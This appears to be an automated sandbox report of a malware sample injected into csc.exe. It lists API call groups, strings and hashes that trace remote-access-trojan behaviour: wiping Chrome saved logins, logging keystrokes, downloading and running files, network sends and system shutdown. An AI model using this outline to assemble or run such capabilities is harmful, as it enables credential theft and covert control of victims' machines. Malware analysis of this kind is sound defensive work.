                                      • String ID:
                                      • API String ID: 314583886-0
                                      • Opcode ID: 15cc721bf36b345a005cee04ee4ee66227f187e3f0d332304a3991bd3da22e63
                                      • Instruction ID: 8b87e38212d70e432f0d45c21c10c2da0ad9042405ab808e013634feac4ff008
                                      • Opcode Fuzzy Hash: 15cc721bf36b345a005cee04ee4ee66227f187e3f0d332304a3991bd3da22e63
                                      • Instruction Fuzzy Hash: 67C15CB1900245ABFB24AF79DC41AAA7BB8EF03314F16416FE48497341EB788E45C75E
                                      APIs
                                      • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040A98F
                                      • GetLastError.KERNEL32 ref: 0040A999
                                      Strings
                                      • UserProfile, xrefs: 0040A95F
                                      • [Chrome StoredLogins not found], xrefs: 0040A9B3
                                      • [Chrome StoredLogins found, cleared!], xrefs: 0040A9BF
                                      • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040A95A
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: DeleteErrorFileLast
                                      • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                      • API String ID: 2018770650-1062637481
                                      • Opcode ID: e2dc748f8a2f2c202dc5dfde2945bc6c5171a76981be289e4bc3f19e588866b0
                                      • Instruction ID: b2134abed7c3f614b53a5a28bf05479c5c2a11b403a78876888f6ce5fd1f590e
                                      • Opcode Fuzzy Hash: e2dc748f8a2f2c202dc5dfde2945bc6c5171a76981be289e4bc3f19e588866b0
                                      • Instruction Fuzzy Hash: 7801F271B9020466CA047A75DC2B8BE7728A921304B90057FF402732E2FE7D8A1586CF
                                      APIs
                                      • GetCurrentProcess.KERNEL32(00000028,?), ref: 00415C9D
                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00415CA4
                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00415CB6
                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00415CD5
                                      • GetLastError.KERNEL32 ref: 00415CDB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                      • String ID: SeShutdownPrivilege
                                      • API String ID: 3534403312-3733053543
                                      • Opcode ID: 6b6a245ea7d04d36a7da703741a32f9ec851e6ff0cbdb80aef66d6ce6c3f9121
                                      • Instruction ID: ffc0972e6e84a8b4c82c7ff824774f91a9d221977230a9de1ecf93d0fe8dbf87
                                      • Opcode Fuzzy Hash: 6b6a245ea7d04d36a7da703741a32f9ec851e6ff0cbdb80aef66d6ce6c3f9121
                                      • Instruction Fuzzy Hash: 0AF03A71901229ABDB10ABA1ED4DEEF7F7CEF05616F510060B805A2152D6749A04CAB5
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00408393
                                        • Part of subcall function 004048A8: connect.WS2_32(?,?,?), ref: 004048C0
                                        • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0040842F
                                      • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040848D
                                      • FindNextFileW.KERNEL32(00000000,?), ref: 004084E5
                                      • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 004084FC
                                        • Part of subcall function 00404E06: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404E18
                                        • Part of subcall function 00404E06: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404E23
                                        • Part of subcall function 00404E06: CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404E2C
                                      • FindClose.KERNEL32(00000000), ref: 004086F4
                                        • Part of subcall function 00404A81: WaitForSingleObject.KERNEL32(?,00000000,0040545D,?,?,00000004,?,?,00000004,?,00471E90,?), ref: 00404B27
                                        • Part of subcall function 00404A81: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00471E90,?,?,?,?,?,?,0040545D), ref: 00404B55
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                      • String ID:
                                      • API String ID: 1824512719-0
                                      • Opcode ID: eb3312e6c80dbe808e14f00ddbf3805688dbfa06e8d27bafb1d5799e3f73d592
                                      • Instruction ID: 071b26812b5e49f88d0361c7bacc9152bfce797c8686ce15524b94070306fde2
                                      • Opcode Fuzzy Hash: eb3312e6c80dbe808e14f00ddbf3805688dbfa06e8d27bafb1d5799e3f73d592
                                      • Instruction Fuzzy Hash: 4FB18D329001099BCB14FBA1CD92AEDB378AF50318F50416FE506B71E2EF785B49CB98
                                      APIs
                                        • Part of subcall function 00410201: SetLastError.KERNEL32(0000000D,00410781,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0041075F), ref: 00410207
                                      • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0041075F), ref: 0041079C
                                      • GetNativeSystemInfo.KERNEL32(?,0040BE60,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0041075F), ref: 0041080A
                                      • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 0041082E
                                        • Part of subcall function 00410708: VirtualAlloc.KERNEL32(00000004,00000004,00000004,00000004,0041084C,?,00000000,00003000,00000004,00000000,?,?), ref: 00410718
                                      • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00410875
                                      • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 0041087C
                                      • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041098F
                                        • Part of subcall function 00410ADC: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,0041099C,?,?,?,?,?), ref: 00410B4C
                                        • Part of subcall function 00410ADC: HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 00410B53
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                      • String ID:
                                      • API String ID: 3950776272-0
                                      • Opcode ID: 97c9471a4feb21372bfec3f691305eac3cca21be586dff8f661e5b3b360a5f75
                                      • Instruction ID: 59628d97446cb481dba570c2b442d682f024dd9dc2812234181a156a821a4c1f
                                      • Opcode Fuzzy Hash: 97c9471a4feb21372bfec3f691305eac3cca21be586dff8f661e5b3b360a5f75
                                      • Instruction Fuzzy Hash: F7619270200211ABD750AF66CD91BAB7BA5BF44714F54412AF9158B382DBFCE8C1CBD9
                                      APIs
                                      • GetForegroundWindow.USER32(00000000,?,00000000), ref: 0040949C
                                      • GetWindowThreadProcessId.USER32(00000000,?), ref: 004094A7
                                      • GetKeyboardLayout.USER32(00000000), ref: 004094AE
                                      • GetKeyState.USER32(00000010), ref: 004094B8
                                      • GetKeyboardState.USER32(?), ref: 004094C5
                                      • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 004094E1
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: KeyboardStateWindow$ForegroundLayoutProcessThreadUnicode
                                      • String ID:
                                      • API String ID: 3566172867-0
                                      • Opcode ID: 8155543480f78c1b64d835a0318248420673f553efbfde4d306f87166cb36bae
                                      • Instruction ID: c7d3d650b917c490fc12d3d20248521073b1bf92526e1b13c177c4272b1ff9cc
                                      • Opcode Fuzzy Hash: 8155543480f78c1b64d835a0318248420673f553efbfde4d306f87166cb36bae
                                      • Instruction Fuzzy Hash: B9111E7290020CABDB10DBE4EC49FDA7BBCEB4C706F510465FA08E7191E675EA548BA4
                                      APIs
                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,00418656,00000000), ref: 00418A09
                                      • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,00418656,00000000), ref: 00418A1E
                                      • CloseServiceHandle.ADVAPI32(00000000,?,00418656,00000000), ref: 00418A2B
                                      • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,00418656,00000000), ref: 00418A36
                                      • CloseServiceHandle.ADVAPI32(00000000,?,00418656,00000000), ref: 00418A48
                                      • CloseServiceHandle.ADVAPI32(00000000,?,00418656,00000000), ref: 00418A4B
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Service$CloseHandle$Open$ManagerStart
                                      • String ID:
                                      • API String ID: 276877138-0
                                      • Opcode ID: 9d1a4ec98bbed0751be7ec1d9edf8d026dddaadd5c40dfa06c1f24457bdb16cd
                                      • Instruction ID: d7e7041197745ae6b8576ac0eea0d71e7d0897d816d6b6e74118e31fa9ec717f
                                      • Opcode Fuzzy Hash: 9d1a4ec98bbed0751be7ec1d9edf8d026dddaadd5c40dfa06c1f24457bdb16cd
                                      • Instruction Fuzzy Hash: CAF082711012246FD211EB65EC89DBF2BACDF85BA6B41042BF801931918F78CD49A9B9
                                      APIs
                                      • FindFirstFileW.KERNEL32(00000000,?), ref: 00417D01
                                      • FindNextFileW.KERNEL32(00000000,?,?), ref: 00417DCD
                                        • Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040983B), ref: 0041A228
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$Find$CreateFirstNext
                                      • String ID: H"G$`'G$`'G
                                      • API String ID: 341183262-2774397156
                                      • Opcode ID: 1cf844efd70cdbf624823fdf1c157efe6821b6b6ba4126c27d058fa0615b4841
                                      • Instruction ID: cc65440c5fe1593426504ff8613f72b7370ef7481f3bf724e026da4e35a467e2
                                      • Opcode Fuzzy Hash: 1cf844efd70cdbf624823fdf1c157efe6821b6b6ba4126c27d058fa0615b4841
                                      • Instruction Fuzzy Hash: 138183315083415BC314FB62C996DEFB7A8AF90304F40493FF586671E2EF789A49C69A
                                      APIs
                                        • Part of subcall function 00415C90: GetCurrentProcess.KERNEL32(00000028,?), ref: 00415C9D
                                        • Part of subcall function 00415C90: OpenProcessToken.ADVAPI32(00000000), ref: 00415CA4
                                        • Part of subcall function 00415C90: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00415CB6
                                        • Part of subcall function 00415C90: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00415CD5
                                        • Part of subcall function 00415C90: GetLastError.KERNEL32 ref: 00415CDB
                                      • ExitWindowsEx.USER32(00000000,00000001), ref: 00414E56
                                      • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00414E6B
                                      • GetProcAddress.KERNEL32(00000000), ref: 00414E72
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                      • String ID: PowrProf.dll$SetSuspendState
                                      • API String ID: 1589313981-1420736420
                                      • Opcode ID: 8c81c0783198099474e82727423ed6c515ab3ccb0f21ae71d2e0142602314b9e
                                      • Instruction ID: 748c18e79ee5f9a1fbb6f05bd7ad52209f91b0004c4d1b0055552a3b76c5c1f9
                                      • Opcode Fuzzy Hash: 8c81c0783198099474e82727423ed6c515ab3ccb0f21ae71d2e0142602314b9e
                                      • Instruction Fuzzy Hash: 5F214F7070430157CE14FBB19896AAF6359AFD4349F40097FB5026B2D2EE7DCC4986AE
                                      APIs
                                      • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0044F93B,?,00000000), ref: 0044F6B5
                                      • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0044F93B,?,00000000), ref: 0044F6DE
                                      • GetACP.KERNEL32(?,?,0044F93B,?,00000000), ref: 0044F6F3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InfoLocale
                                      • String ID: ACP$OCP
                                      • API String ID: 2299586839-711371036
                                      • Opcode ID: bf4880e5188eb12a7c294a6f25afa26b03a49e2ed1ffce5823e951fdb7c5b330
                                      • Instruction ID: bf1e89585aec8fc6a823a5c6a63220f2d7696aba51182a9853130589b0d37fa4
                                      • Opcode Fuzzy Hash: bf4880e5188eb12a7c294a6f25afa26b03a49e2ed1ffce5823e951fdb7c5b330
                                      • Instruction Fuzzy Hash: 2221C122A00101A6F7348F24C901A9B73AAAF50B65F578577E809C7221FB36DD4BC398
                                      APIs
                                      • FindResourceA.KERNEL32(SETTINGS,0000000A), ref: 004194A4
                                      • LoadResource.KERNEL32(00000000,?,?,?,0040DD9E), ref: 004194B8
                                      • LockResource.KERNEL32(00000000,?,?,?,0040DD9E), ref: 004194BF
                                      • SizeofResource.KERNEL32(00000000,?,?,?,0040DD9E), ref: 004194CE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Resource$FindLoadLockSizeof
                                      • String ID: SETTINGS
                                      • API String ID: 3473537107-594951305
                                      • Opcode ID: 7f61ee72686a272b8f551de58b86ae3e218e906a9fde472ee07ff8038d16bca4
                                      • Instruction ID: a9e8191b24fee58836060ebd07e0bd7776b83e69f4e337d8cda710b4f32c44fb
                                      • Opcode Fuzzy Hash: 7f61ee72686a272b8f551de58b86ae3e218e906a9fde472ee07ff8038d16bca4
                                      • Instruction Fuzzy Hash: 72E01A76200710ABCB211FA1FC5CD273E69F799B537050035FA0183222DA75CC00CA19
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 004087A5
                                      • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040881D
                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00408846
                                      • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040885D
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstH_prologNext
                                      • String ID:
                                      • API String ID: 1157919129-0
                                      • Opcode ID: 538d269e0e65526fc79ca22ebb8d996839002f88992148900ebb25fb660bfcd1
                                      • Instruction ID: 37d480644902bd8bd77a9749fd647df5a3db5b19bbca398f696489d34b7b99bb
                                      • Opcode Fuzzy Hash: 538d269e0e65526fc79ca22ebb8d996839002f88992148900ebb25fb660bfcd1
                                      • Instruction Fuzzy Hash: 12814D329001199BCB15EBA1DD929ED73B8AF54308F10427FE446B71E2EF385B49CB98
                                      APIs
                                        • Part of subcall function 00445725: GetLastError.KERNEL32(00000020,?,00438595,?,?,?,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B), ref: 00445729
                                        • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                        • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 0044579D
                                        • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                        • Part of subcall function 00445725: _free.LIBCMT ref: 00445784
                                        • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 00445791
                                      • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0044F8FC
                                      • IsValidCodePage.KERNEL32(00000000), ref: 0044F957
                                      • IsValidLocale.KERNEL32(?,00000001), ref: 0044F966
                                      • GetLocaleInfoW.KERNEL32(?,00001001,00441F7E,00000040,?,0044209E,00000055,00000000,?,?,00000055,00000000), ref: 0044F9AE
                                      • GetLocaleInfoW.KERNEL32(?,00001002,00441FFE,00000040), ref: 0044F9CD
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                      • String ID:
                                      • API String ID: 745075371-0
                                      • Opcode ID: b2004c1cc1df407676deb5a86971a5ed3ade22d67ad87857b151b1318ee5498f
                                      • Instruction ID: 3a6be996f1d9ea25600d7609fa1d0555167a50dcc121ad64ff78238f3932635f
                                      • Opcode Fuzzy Hash: b2004c1cc1df407676deb5a86971a5ed3ade22d67ad87857b151b1318ee5498f
                                      • Instruction Fuzzy Hash: 0351A271900215AFFB20EFA5DC41BBF77B8AF08301F05447BE914EB251E7789A088769
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 0040784D
                                      • FindFirstFileW.KERNEL32(00000000,?,004632A8,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407906
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0040792E
                                      • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040793B
                                      • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407A51
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                      • String ID:
                                      • API String ID: 1771804793-0
                                      • Opcode ID: c75668300033509d6f0f4d2d7d7a9348541b986776a057766dc196d36295dd48
                                      • Instruction ID: 4b9324871479917b5af30c26e04a30266e6971a3e86a210f007197118c0b57fe
                                      • Opcode Fuzzy Hash: c75668300033509d6f0f4d2d7d7a9348541b986776a057766dc196d36295dd48
                                      • Instruction Fuzzy Hash: 18516372904208AACB04FBA1DD969DD7778AF11308F50417FB846771E2EF389B49CB99
                                      APIs
                                        • Part of subcall function 00419F23: GetCurrentProcess.KERNEL32(?,?,?,0040C663,WinDir,00000000,00000000), ref: 00419F34
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E305
                                      • Process32FirstW.KERNEL32(00000000,?), ref: 0040E329
                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E338
                                      • CloseHandle.KERNEL32(00000000), ref: 0040E4EF
                                        • Part of subcall function 00419F51: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040DFB9,00000000,?,?,00000001), ref: 00419F66
                                        • Part of subcall function 00419F87: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 00419F9C
                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E4E0
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ProcessProcess32$NextOpen$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                      • String ID:
                                      • API String ID: 1735047541-0
                                      • Opcode ID: 381970d14b411c623136c8c66db22cf004c399012ffbebf914150cd852c4ebaf
                                      • Instruction ID: 9ef93eb2fb75da2762b4731e21c5b8dc01158be40bd3d18dbb98703d8f1b3e60
                                      • Opcode Fuzzy Hash: 381970d14b411c623136c8c66db22cf004c399012ffbebf914150cd852c4ebaf
                                      • Instruction Fuzzy Hash: 904101311082415BC365F761D991EEFB3A8AFD4344F50493EF48A921E2EF38994AC75A
                                      APIs
                                      • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004064D2
                                      • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004065B6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: DownloadExecuteFileShell
                                      • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe$open
                                      • API String ID: 2825088817-3605309450
                                      • Opcode ID: 44b6a91d556c8e7c66739505cf2d9e2d89d259d5d60e37cfa0b67fdb7c66dc71
                                      • Instruction ID: de45ecf938be0b84f02b1b366aeabb591a3e89dbb22835c7232af05a142efef6
                                      • Opcode Fuzzy Hash: 44b6a91d556c8e7c66739505cf2d9e2d89d259d5d60e37cfa0b67fdb7c66dc71
                                      • Instruction Fuzzy Hash: 6F61D331A0430167CA14FB75D8A697E77A99F81708F00093FFD42772D6EE3D8A09869B
                                      APIs
                                      • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041A861
                                        • Part of subcall function 0041215F: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041216E
                                        • Part of subcall function 0041215F: RegSetValueExA.KERNELBASE(?,00464150,00000000,?,00000000,00000000,00472200,?,pth_unenc,0040E23B,00464150,3.8.0 Pro), ref: 00412196
                                        • Part of subcall function 0041215F: RegCloseKey.KERNELBASE(?,?,pth_unenc,0040E23B,00464150,3.8.0 Pro), ref: 004121A1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseCreateInfoParametersSystemValue
                                      • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                      • API String ID: 4127273184-3576401099
                                      • Opcode ID: b2b5532adfee4e4b900b4fad0ed9cd8c83e1a92fc8b848bb2064ac0ba1e99bb2
                                      • Instruction ID: 146807b905f8226e4159dba151db05d0611ea4827dca33b530162433be1e3f9d
                                      • Opcode Fuzzy Hash: b2b5532adfee4e4b900b4fad0ed9cd8c83e1a92fc8b848bb2064ac0ba1e99bb2
                                      • Instruction Fuzzy Hash: 7C119671F8024037D514353A4D6BBAE18199343B50F54016BB6022B6CAF8EE4EA553DF
                                      APIs
                                        • Part of subcall function 00445725: GetLastError.KERNEL32(00000020,?,00438595,?,?,?,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B), ref: 00445729
                                        • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                        • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 0044579D
                                        • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                      • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00441F85,?,?,?,?,004419DC,?,00000004), ref: 0044EF9A
                                      • _wcschr.LIBVCRUNTIME ref: 0044F02A
                                      • _wcschr.LIBVCRUNTIME ref: 0044F038
                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00441F85,00000000,004420A5), ref: 0044F0DB
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                      • String ID:
                                      • API String ID: 4212172061-0
                                      • Opcode ID: 2958d0d59106b2716bbf9024854ff4f325b6253e079e5f73fc6a0a954244a96d
                                      • Instruction ID: 651119c321e801f17dd1a7ba429a2dceeb4aa1bed9d5f8a21b6634afb1069130
                                      • Opcode Fuzzy Hash: 2958d0d59106b2716bbf9024854ff4f325b6253e079e5f73fc6a0a954244a96d
                                      • Instruction Fuzzy Hash: 8E61E935600606AAFB24AB36DC46BB773A8FF44714F14047FF905D7282EB78E9488769
                                      APIs
                                        • Part of subcall function 00445725: GetLastError.KERNEL32(00000020,?,00438595,?,?,?,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B), ref: 00445729
                                        • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                        • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 0044579D
                                        • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                        • Part of subcall function 00445725: _free.LIBCMT ref: 00445784
                                        • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 00445791
                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F2F7
                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F348
                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F408
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorInfoLastLocale$_free$_abort
                                      • String ID:
                                      • API String ID: 2829624132-0
                                      • Opcode ID: 5d155598132bf3b03d9715496123f76655355fd2299683488a64446915391091
                                      • Instruction ID: 12c224c4da0c85949021a4ccaa6d586ab513ef91610cb16151a2099a543b2454
                                      • Opcode Fuzzy Hash: 5d155598132bf3b03d9715496123f76655355fd2299683488a64446915391091
                                      • Instruction Fuzzy Hash: 49617D71600207ABEB289F25CC82B7B77A8EF14314F1041BBED06C6685EB78D949DB58
                                      APIs
                                      • IsDebuggerPresent.KERNEL32 ref: 004399A4
                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004399AE
                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 004399BB
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                      • String ID:
                                      • API String ID: 3906539128-0
                                      • Opcode ID: a2edd11b745fd0db19ae8b75a4dca2fd63e5a3b0d4ecfa6da1b026d4ab375051
                                      • Instruction ID: 77e6618fa9d19f9c50586940e2a7469f5a9d54f298177c93e0bbf68cc30459b4
                                      • Opcode Fuzzy Hash: a2edd11b745fd0db19ae8b75a4dca2fd63e5a3b0d4ecfa6da1b026d4ab375051
                                      • Instruction Fuzzy Hash: 1D31D67591122C9BCB21DF65D9897CDB7B8BF08310F5051EAE40CA72A1E7749F858F48
                                      APIs
